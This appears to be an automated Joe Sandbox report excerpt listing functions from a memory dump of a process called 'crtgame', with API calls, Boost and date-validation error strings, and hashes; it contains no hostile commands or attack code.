                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prolog$_mallocstd::exception::exception
                                                                                    • String ID: C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp$class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_alloc_>(void)
                                                                                    • API String ID: 1953324306-1943798000
                                                                                    • Opcode ID: 2fe158713eb83b6196db162048aab17dbb1491da1c8cd710fef36da8393a6997
                                                                                    • Instruction ID: 61ea43f1ba4c20f3dee6a0db78bb92cd64133c89b65ad30c7d7e53226c844710
                                                                                    • Opcode Fuzzy Hash: 2fe158713eb83b6196db162048aab17dbb1491da1c8cd710fef36da8393a6997
                                                                                    • Instruction Fuzzy Hash: CA21ADB1E012589ADB08EFE8D954BEEBBB5EF54700F10449EE806A7290DF749A08DF50
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 02C4C732
                                                                                      • Part of subcall function 02C4CCF0: std::exception::exception.LIBCMT ref: 02C4CD1D
                                                                                      • Part of subcall function 02C4D509: __EH_prolog.LIBCMT ref: 02C4D50E
                                                                                      • Part of subcall function 02C5354C: _malloc.LIBCMT ref: 02C53564
                                                                                      • Part of subcall function 02C4CD4D: __EH_prolog.LIBCMT ref: 02C4CD52
                                                                                    Strings
                                                                                    • class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_exception_>(void), xrefs: 02C4C768
                                                                                    • C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp, xrefs: 02C4C76F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prolog$_mallocstd::exception::exception
                                                                                    • String ID: C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp$class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_exception_>(void)
                                                                                    • API String ID: 1953324306-412195191
                                                                                    • Opcode ID: 136af89ee188c62c71b148b576d3dcdf723b9d1b7b73bf776b26892335eed36e
                                                                                    • Instruction ID: ab62121c46118fb452d5a12310f49e7d1f2b86999b906b00fb03dc900a375698
                                                                                    • Opcode Fuzzy Hash: 136af89ee188c62c71b148b576d3dcdf723b9d1b7b73bf776b26892335eed36e
                                                                                    • Instruction Fuzzy Hash: DC21B1B1E012589BDB14EFE4D488BAEFBB5EF44704F14055EE806A7250DF705A08DF90
                                                                                    APIs
                                                                                    • _malloc.LIBCMT ref: 02C45288
                                                                                      • Part of subcall function 02C529AC: __FF_MSGBANNER.LIBCMT ref: 02C529C3
                                                                                      • Part of subcall function 02C529AC: __NMSG_WRITE.LIBCMT ref: 02C529CA
                                                                                      • Part of subcall function 02C529AC: RtlAllocateHeap.NTDLL(008C0000,00000000,00000001), ref: 02C529EF
                                                                                    • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,00000023,00000000,00002000,00000000,00000001,00000000,00000000,?,02C475B2), ref: 02C4529A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AllocateFolderHeapPathSpecial_malloc
                                                                                    • String ID: \save.dat
                                                                                    • API String ID: 4128168839-3580179773
                                                                                    • Opcode ID: 8f2e61b8cb77f1a074034fe6515a663ed9d1f190a82603e67450e9bd45f603b9
                                                                                    • Instruction ID: 907d7d70a2c2f3e541803ee660b9ca1bafdb7516a9d771b67d08202531693b29
                                                                                    • Opcode Fuzzy Hash: 8f2e61b8cb77f1a074034fe6515a663ed9d1f190a82603e67450e9bd45f603b9
                                                                                    • Instruction Fuzzy Hash: 05117D72A042512BDB219E658C84A6FFF67DFC269471401ADEC4967201DAA31E02C6A0
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 02C4396A
                                                                                    • std::runtime_error::runtime_error.LIBCPMT ref: 02C439C1
                                                                                      • Part of subcall function 02C41410: std::exception::exception.LIBCMT ref: 02C41428
                                                                                      • Part of subcall function 02C49FA7: __EH_prolog.LIBCMT ref: 02C49FAC
                                                                                      • Part of subcall function 02C49FA7: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 02C49FBB
                                                                                      • Part of subcall function 02C49FA7: __CxxThrowException@8.LIBCMT ref: 02C49FDA
                                                                                    Strings
                                                                                    • Day of month is not valid for year, xrefs: 02C439AC
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prolog$Concurrency::cancellation_token::_Exception@8FromImplThrowstd::exception::exceptionstd::runtime_error::runtime_error
                                                                                    • String ID: Day of month is not valid for year
                                                                                    • API String ID: 1404951899-1521898139
                                                                                    • Opcode ID: 115c1e7eb7f00c7514ba3144c1cabaade9fc8891796453c6f99dbb89283086b8
                                                                                    • Instruction ID: a9c2b8830fc90c821c3336aeffc8edd6893d2e43df4ae26322702be351a12f34
                                                                                    • Opcode Fuzzy Hash: 115c1e7eb7f00c7514ba3144c1cabaade9fc8891796453c6f99dbb89283086b8
                                                                                    • Instruction Fuzzy Hash: E901B176910249AADF04EFA4D845AFFB779FF58710F40411AEC04A3200EB708A45DB95
                                                                                    APIs
                                                                                    • std::exception::exception.LIBCMT ref: 02C4F510
                                                                                    • __CxxThrowException@8.LIBCMT ref: 02C4F525
                                                                                      • Part of subcall function 02C5354C: _malloc.LIBCMT ref: 02C53564
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Exception@8Throw_mallocstd::exception::exception
                                                                                    • String ID: bad allocation
                                                                                    • API String ID: 4063778783-2104205924
                                                                                    • Opcode ID: 1fba1d0dd2cabf542241099b6382b248a69e113057258154909c886d81c0b58a
                                                                                    • Instruction ID: 89e216b612bb3c139a423d7be20c112cf924dc741fc67cf3e2d1eccc79753a99
                                                                                    • Opcode Fuzzy Hash: 1fba1d0dd2cabf542241099b6382b248a69e113057258154909c886d81c0b58a
                                                                                    • Instruction Fuzzy Hash: A4F02EB068030D679F04EAA8895CABF77FC9B40340B4005A6E915D3180EF70E7408994
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 02C43C1B
                                                                                    • std::bad_exception::bad_exception.LIBCMT ref: 02C43C30
                                                                                      • Part of subcall function 02C51EB7: std::exception::exception.LIBCMT ref: 02C51EC1
                                                                                      • Part of subcall function 02C49FE0: __EH_prolog.LIBCMT ref: 02C49FE5
                                                                                      • Part of subcall function 02C49FE0: __CxxThrowException@8.LIBCMT ref: 02C4A00E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prolog$Exception@8Throwstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                    • String ID: bad cast
                                                                                    • API String ID: 1300498068-3145022300
                                                                                    • Opcode ID: 6f5b9b05887d76fe66ca95522c137e85052b9afec78caf12c2839edc0e7ac55a
                                                                                    • Instruction ID: eb20b6db824aa8039ece66942f2b73e2a9207fcbbea95cce786f22613c8158bf
                                                                                    • Opcode Fuzzy Hash: 6f5b9b05887d76fe66ca95522c137e85052b9afec78caf12c2839edc0e7ac55a
                                                                                    • Instruction Fuzzy Hash: E3F0A072E005048BCB19EF58D484AEBB775EF62355F1001AEED065B240CBB29A46DAD1
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 02C438D2
                                                                                    • std::runtime_error::runtime_error.LIBCPMT ref: 02C438F1
                                                                                      • Part of subcall function 02C41410: std::exception::exception.LIBCMT ref: 02C41428
                                                                                    Strings
                                                                                    • Year is out of valid range: 1400..10000, xrefs: 02C438E0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prologstd::exception::exceptionstd::runtime_error::runtime_error
                                                                                    • String ID: Year is out of valid range: 1400..10000
                                                                                    • API String ID: 2067857976-2344417016
                                                                                    • Opcode ID: cbd41c7608f0114675fc457af90eaa1731f8ba73766c0b3cf842de10118f46be
                                                                                    • Instruction ID: 227ff45a96d7f7eee4394d72845a0864863d815a025ed1153a76d73ec0b6cbb5
                                                                                    • Opcode Fuzzy Hash: cbd41c7608f0114675fc457af90eaa1731f8ba73766c0b3cf842de10118f46be
                                                                                    • Instruction Fuzzy Hash: FFE0D8B2F4011457DB28EF98CC597FEB7B9DB08750F00015AE80563280DFB11948DB90
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 02C43886
                                                                                    • std::runtime_error::runtime_error.LIBCPMT ref: 02C438A5
                                                                                      • Part of subcall function 02C41410: std::exception::exception.LIBCMT ref: 02C41428
                                                                                    Strings
                                                                                    • Day of month value is out of range 1..31, xrefs: 02C43894
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prologstd::exception::exceptionstd::runtime_error::runtime_error
                                                                                    • String ID: Day of month value is out of range 1..31
                                                                                    • API String ID: 2067857976-1361117730
                                                                                    • Opcode ID: 3424bb86ece50d2e34fcc69948c0e18bd571489a510702fcb0a639280dcaf851
                                                                                    • Instruction ID: ce85be5b7f7addcc3de692d6a58542ca31848861dd05214976f187112ec6b5ab
                                                                                    • Opcode Fuzzy Hash: 3424bb86ece50d2e34fcc69948c0e18bd571489a510702fcb0a639280dcaf851
                                                                                    • Instruction Fuzzy Hash: 19E0D8B2F4011497DB24EF94CC997FEB779DB08750F00055AE80573280DFB11944DB90
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 02C4391E
                                                                                    • std::runtime_error::runtime_error.LIBCPMT ref: 02C4393D
                                                                                      • Part of subcall function 02C41410: std::exception::exception.LIBCMT ref: 02C41428
                                                                                    Strings
                                                                                    • Month number is out of range 1..12, xrefs: 02C4392C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prologstd::exception::exceptionstd::runtime_error::runtime_error
                                                                                    • String ID: Month number is out of range 1..12
                                                                                    • API String ID: 2067857976-4198407886
                                                                                    • Opcode ID: 3481e647ac04a594a66bc011c362d312d376a8efa1dacfbfe4045887f445dda1
                                                                                    • Instruction ID: 66c923bb320ee6d6257e07c8079fa463bb3ac6ddc6c34bfba5995ce92ad4107a
                                                                                    • Opcode Fuzzy Hash: 3481e647ac04a594a66bc011c362d312d376a8efa1dacfbfe4045887f445dda1
                                                                                    • Instruction Fuzzy Hash: EDE092B2A4421457D724AB9488597EEB779DB08750F00015AE80563280DFB119449B91
                                                                                    APIs
                                                                                    • TlsAlloc.KERNEL32 ref: 02C419CC
                                                                                    • GetLastError.KERNEL32 ref: 02C419D9
                                                                                      • Part of subcall function 02C41712: __EH_prolog.LIBCMT ref: 02C41717
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AllocErrorH_prologLast
                                                                                    • String ID: tss
                                                                                    • API String ID: 249634027-1638339373
                                                                                    • Opcode ID: 9ad2515cb3854490d229e71f73ecbb5655d0fd3c6a6e40d0d9430b1fedd59aea
                                                                                    • Instruction ID: 88cda5dafffea7f2852efbc41c734ee55bdb6e0dca8b4fb06655dfbc4fd7118f
                                                                                    • Opcode Fuzzy Hash: 9ad2515cb3854490d229e71f73ecbb5655d0fd3c6a6e40d0d9430b1fedd59aea
                                                                                    • Instruction Fuzzy Hash: 59E08631D042145BC2007B78980C19BBB94DA44234F104B66EDED833D0EF7189949BD6
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 02C43BD8
                                                                                    • std::bad_exception::bad_exception.LIBCMT ref: 02C43BED
                                                                                      • Part of subcall function 02C51EB7: std::exception::exception.LIBCMT ref: 02C51EC1
                                                                                      • Part of subcall function 02C49FE0: __EH_prolog.LIBCMT ref: 02C49FE5
                                                                                      • Part of subcall function 02C49FE0: __CxxThrowException@8.LIBCMT ref: 02C4A00E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prolog$Exception@8Throwstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                    • String ID: bad cast
                                                                                    • API String ID: 1300498068-3145022300
                                                                                    • Opcode ID: 752f70d3624232e829ccb8e9d8890820c1700f11ce6443607ceabd1b09f3caeb
                                                                                    • Instruction ID: 1db9ee6b1eb7979cde43dc1cbfd1f2bb6584d0233e88af80deec6a6276e630b0
                                                                                    • Opcode Fuzzy Hash: 752f70d3624232e829ccb8e9d8890820c1700f11ce6443607ceabd1b09f3caeb
                                                                                    • Instruction Fuzzy Hash: 3DE0D6B0E00108DBCB28EF54D989BBEBB71EF21304F1081ACAC0647780CF718A46CE82